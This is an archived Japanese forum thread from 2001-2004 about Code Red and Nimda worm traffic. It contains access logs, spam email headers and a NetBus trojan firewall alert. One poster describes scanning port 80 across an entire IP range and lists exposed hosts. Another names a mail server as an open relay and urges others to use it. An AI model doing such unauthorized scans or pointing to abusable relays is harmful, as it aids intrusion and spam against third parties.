[2001/09/24 4:42:10] --unknown-- from: 202.29.26.20 /
[2001/09/24 4:42:19] --unknown-- from: 202.29.26.20 /
[2001/09/24 4:42:24] --unknown-- from: 202.29.26.20 /
[2001/09/24 4:42:30] --unknown-- from: 202.29.26.20 /
[2001/09/24 4:42:36] --unknown-- from: 202.29.26.20 /
[2001/09/24 4:42:41] --unknown-- from: 202.29.26.20 /
[2001/09/24 4:42:47] --unknown-- from: 202.29.26.20 /
[2001/09/24 4:42:53] --unknown-- from: 202.29.26.20 /
[2001/09/24 4:42:59] --unknown-- from: 202.29.26.20 /
[2001/09/24 4:43:04] --unknown-- from: 202.29.26.20 /
[2001/09/24 4:43:10] --unknown-- from: 202.29.26.20 /
[2001/09/24 4:43:16] --unknown-- from: 202.29.26.20 /
[2001/09/24 4:43:21] --unknown-- from: 202.29.26.20 /
[2001/09/24 4:43:27] --unknown-- from: 202.29.26.20 /
[2001/09/24 4:43:33] --unknown-- from: 202.29.26.20 /
[2001/09/24 4:43:38] --unknown-- from: 202.29.26.20 /

131 :対策済:01/09/24 08:21
From: info@news.luckycherrycasino.com
Subject:Lucky Cherry Casino Newsletter
Date :21 Sep 2001 10:55:20 -0000
Received: from [216.191.167.10] by hotmail.com (3.2) with ESMTP id MHotMail*****; Fri, 21 Sep 2001 **:**:** -0700
Received: (qmail 31693 invoked by uid 0); 21 Sep 2001 10:55:20 -0000
From root@news.luckycherrycasino.com Fri, 21 Sep 2001 09:44:17 -0700
Message-ID: < 20010921105520.31692.qmail@news.luckycherrycasino.com >

From : jimsrelaysdotnet@wherehasmyworldgone.com
To : smm46@delphi.com
Subject: Take a look at this and tell me what you think
Date :Wed, 19 Sep 2001 22:00:38
MIME-Version: 1.0
Received: from [211.23.7.178] by hotmail.com (3.2) with ESMTP id MHotMail*****; Wed, 19 Sep 2001 **:**:** -0700
Received: from html (slip-32-102-47-238.tx.us.prserv.net [32.102.47.238])by www.nakama.com.tw (Postfix) with SMTPid E3B05FB9CA; Thu, 20 Sep 2001 12:07:46 +0800 (CST)
From jimsrelaysdotnet@wherehasmyworldgone.com Wed, 19 Sep 2001 20:01:07 -0700
Message-Id: < 20010920040746.E3B05FB9CA@www.nakama.com.tw >

From : xw76snrh7s@hotmail.com
To : < xw76snrh7s@hotmail.com >
Subject :Special Promotion Viagra (6) 50mg. doses FREE Consultation $104.99 ORDER NOW!
Date :Thu, 19 Jul 2001 21:21:18 -0400
MIME-Version: 1.0
Received: from [209.11.18.235] by hotmail.com (3.2) with ESMTP id MHotMail*****; Thu, 20 Sep 2001 **:**:** -0700
Received: from 12.64.204.77 ([12.64.204.77]) by iis2-nyc.kikko.com with Microsoft SMTPSVC(5.0.2195.2966); Wed, 19 Sep 2001 22:17:12 -0400
From xw76snrh7s@hotmail.com Thu, 20 Sep 2001 19:37:57 -0700
X-Priority: 3
X-MSMail-Priority: Normal
Errors-To: at2nhpfjr6wxt@mail.forum.dk
Return-Path: at2nhpfjr6wxt@mail.forum.dk
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
Message-ID: < IIS2-NYCbdkSmLAztxc00000003@iis2-nyc.kikko.com >
X-OriginalArrivalTime: 20 Sep 2001 02:17:14.0830 (UTC)

132 :対策済:01/09/25 04:30
From : ittinfo100@excite.com


Subject : Re: Make Unlimited Phone Calls for $69.95/month! CODE:7777
Date : Mon, 24 Sep 2001 12:58:00 -0400
Received: from [203.228.117.254] by hotmail.com (3.2) with ESMTP id MHotMail***
From ittinfo100@excite.com Mon, 24 Sep 2001 09:57:49 -0700
X-Sender: ittinfo100@excite.com
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1
X-Priority: 3
X-MSMail-Priority: Normal
ittremove@excite.com

From : Luigi@getfreepizza.com
Subject : FREE Pizza Hut pizza for a year !!
Date : Fri, 21 Sep 2001 17:54:25 -0600
MIME-Version: 1.0
Received: from [139.142.205.227] by hotmail.com (3.2) with ESMTP id MHotMail***
Received: from playsic-en4q0ov (localhost) by mail2.playsic.com (LSMTP for Windows NT v1.1b) with SMTP id <11.0000002F@mail2.playsic.com>; Fri, 21 Sep 2001 18:01:56 -0600
From owner-nolist-testbounce Sat, 22 Sep 2001 00:38:14 -0700

From : PUNTOG.NET < correono@puntog.net >
Subject : World Trade Center + 400 fotos, videos, etc. --> Noticias PUNTOG.NET - 22.09.2001 - SOMOS de 15.000.-
Date : Mon, 24 Sep 2001 21:10:00 +0200
MIME-Version: 1.0
Received: from [195.53.204.158] by hotmail.com (3.2) with ESMTP id MHotMail***
Received: from localhost ([217.126.109.143]) by infonegocio.com with Microsoft SMTPSVC(5.5.1877.507.50); Mon, 24 Sep 2001 00:17:32 +0200
From correono@puntog.net Sun, 23 Sep 2001 15:21:55 -0700
X-Sender: correono@puntog.net
Organization: www.puntog.net
Return-Path: correono@puntog.net
Message-ID: < 06d2e3217221791SMTPOP140@infonegocio.com >

133 :名無しさん@お腹いっぱい。:01/09/25 18:31
ここ、下がり続けてるからコッソリここに書こう〜っと。

CodeRedにしても、NimdaにしてもおれのPCに残るアクセスログって
最近jpドメインほとんど来ない(中国、韓国ばっかり)
絶対隠れ感染者居るんだろうなぁと思って、61.121.*.*の80ポートのみに
総スキャンかけてみた。

80ポート空けてるほとんどが、UNIX プラス アパッチ。
でも、たま〜にIIS(w
しかも感染してるし。

ルーターの設定画面も何個か出てきた。
これ、結構面白いかも。

134 :133:01/09/25 23:24
途中経過(感染サイトではないよ)
61.121.70.24
61.121.75.89
61.121.76.66

今日はもうヤメ。

135 :名無しさん@お腹いっぱい。:01/09/27 00:09
>>133
ハケーン!(ワラ

思えば、このスレのタイトルは「2000厨は逝ってよし」なわけだが、
Nimda騒動でその言葉を激しく実感している今日この頃。
セキュリティとかウイルスの問題ではなくて、
基本中の基本も知らない(知ろうともしない)完全なる初心者がW2Kを使っている。
かなーり疲れます。

136 :名無しさん@お腹ごろごろ:01/09/27 23:35
WIN2000proにIISを同梱したのがアレだと思う。

137 :対策済:01/09/28 00:26
「NetBus Trojan」が 213.196.131.167,NetBus を許可しました。 詳細:
インバウンド TCP 接続
ローカルアドレス、 サービスは 213.196.131.167,NetBus
リモートアドレス、 サービスは 211.238.18.191,1695
プロセス名は N/A


ittinfo100@excite.com

ittremove@excite.com

Luigi@getfreepizza.com

110000002F@mail2.playsic.com

correono@puntog.net

06d2e3217221791SMTPOP140@infonegocio.com

Copyleft (C) 水泥棒菊池Mツトム県こめよし村1偏屈ババア菊池殿様先生記念館在住役人
フン猿しいやどけてんろ禿タコゴリラ貝市来@三原名誉会長ダイワ運湯5老出身本社浪再無視

文責 スッポン放送汚れ穴ウンサーチャッキー恩田

138 : :01/09/28 01:33
>>133
>ルーターの設定画面も何個か出てきた。
・・(以下略

139 :名無しさん@お腹いっぱい。:01/09/28 10:18
>>136
アレって何?

140 : :01/09/28 11:53
うちも中国、韓国ばっか。KoreaTelecomのどっかの研究所もあった。

141 :名無しさん@お腹いっぱい。:01/09/28 20:11
ところで、

こういうのや、
telnet://202.223.228.9

こんなの、
http://www.conet-nagano.gr.jp/

放置すんな(--;

142 :名無しさん@お腹いっぱい。:01/09/29 23:35
age

143 :名無しさん@お腹いっぱい。:01/10/05 16:31
ftp.hp-korea.com
姦國HulettPackrdやられてますね…

144 :名無しさん@:01/10/08 14:35
Code Blue
は終わった?

145 :第三者中継可能!使ってやってくれ!:01/10/08 15:54
mail2.pyramidweb.com

From : pemf@msn.com
Reply-To : brooksfraser3722@excite.com
To : u8ao@msn.com
Subject:Merge bills into 1 monthly payment! [dg58t]
Date:Sat, 6 Oct ***** MIME-Version: 1.0
Received: from [204.142.79.55] by hotmail.com (3.2) with ESMTP id MHotMail*****
Received: from alflv@msn.com ([216.12.96.66]) by pyramid03@pyramidweb.com
(Lotus Domino Release 5.0.3) with SMTP id 2001100623372968:909 ; Sat, 6 Oct 2001 23:37:29 -0400
From pemf@msn.com Sun, 07 Oct 2001 02:01:13 -0700
X-Mailer: WEBmail 2.70
X-MIMETrack: Itemize by SMTP Server on Pyramid03/Pyramid Consulting Services(Release 5.0.3 |March 21, 2000)
at 10/06/2001 11:37:30 PM,Serialize by Router on Pyramid01/Pyramid Consulting Services(Release 5.0.6a |January 17, 2001)
at 10/07/2001 05:16:40 AM,Serialize complete at 10/07/2001 05:16:40 AM
Message-ID: <OF4D3671E5.320E549B-ON85256ADE.0013E9A7@LocalDomain>

146 :http://mokorikomo.2ch.net/ :01/11/14 05:12


147 :名無しさん@お腹いっぱい。:02/02/11 09:09
今からだ、見てろ!

148 :名無しさん@お腹いっぱい。:02/08/27 13:37
コードブルー
コドブル
コトブル
ことぶき
寿

149 :名無しさん@お腹いっぱい。:02/11/24 20:23
i

150 :山崎渉:03/01/15 15:59
(^^)

151 :山崎渉:03/01/16 04:00
(^^)

152 :山崎渉:03/03/13 17:52
(^^)

153 :名無しさん@お腹いっぱい。:03/04/09 21:24
おでもネメッケ星につれてけけ!

154 :山崎渉:03/04/17 12:11
(^^)

155 :山崎渉:03/04/20 06:18
   ∧_∧
  (  ^^ )< ぬるぽ(^^)

156 :山崎渉:03/05/22 02:21
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―

157 :山崎 渉:03/07/15 11:19

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄

158 :ぼるじょあ ◆yBEncckFOU :03/08/02 05:03
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎――――――◎                      山崎渉&ぼるじょあ

159 :山崎 渉:03/08/15 23:22
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン

160 :名無しさん@お腹いっぱい。:04/03/28 02:05
fa

43 KB
■ このスレッドは過去ログ倉庫に格納されています

>>1 >>1 >>1 >>1 >>1 ★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)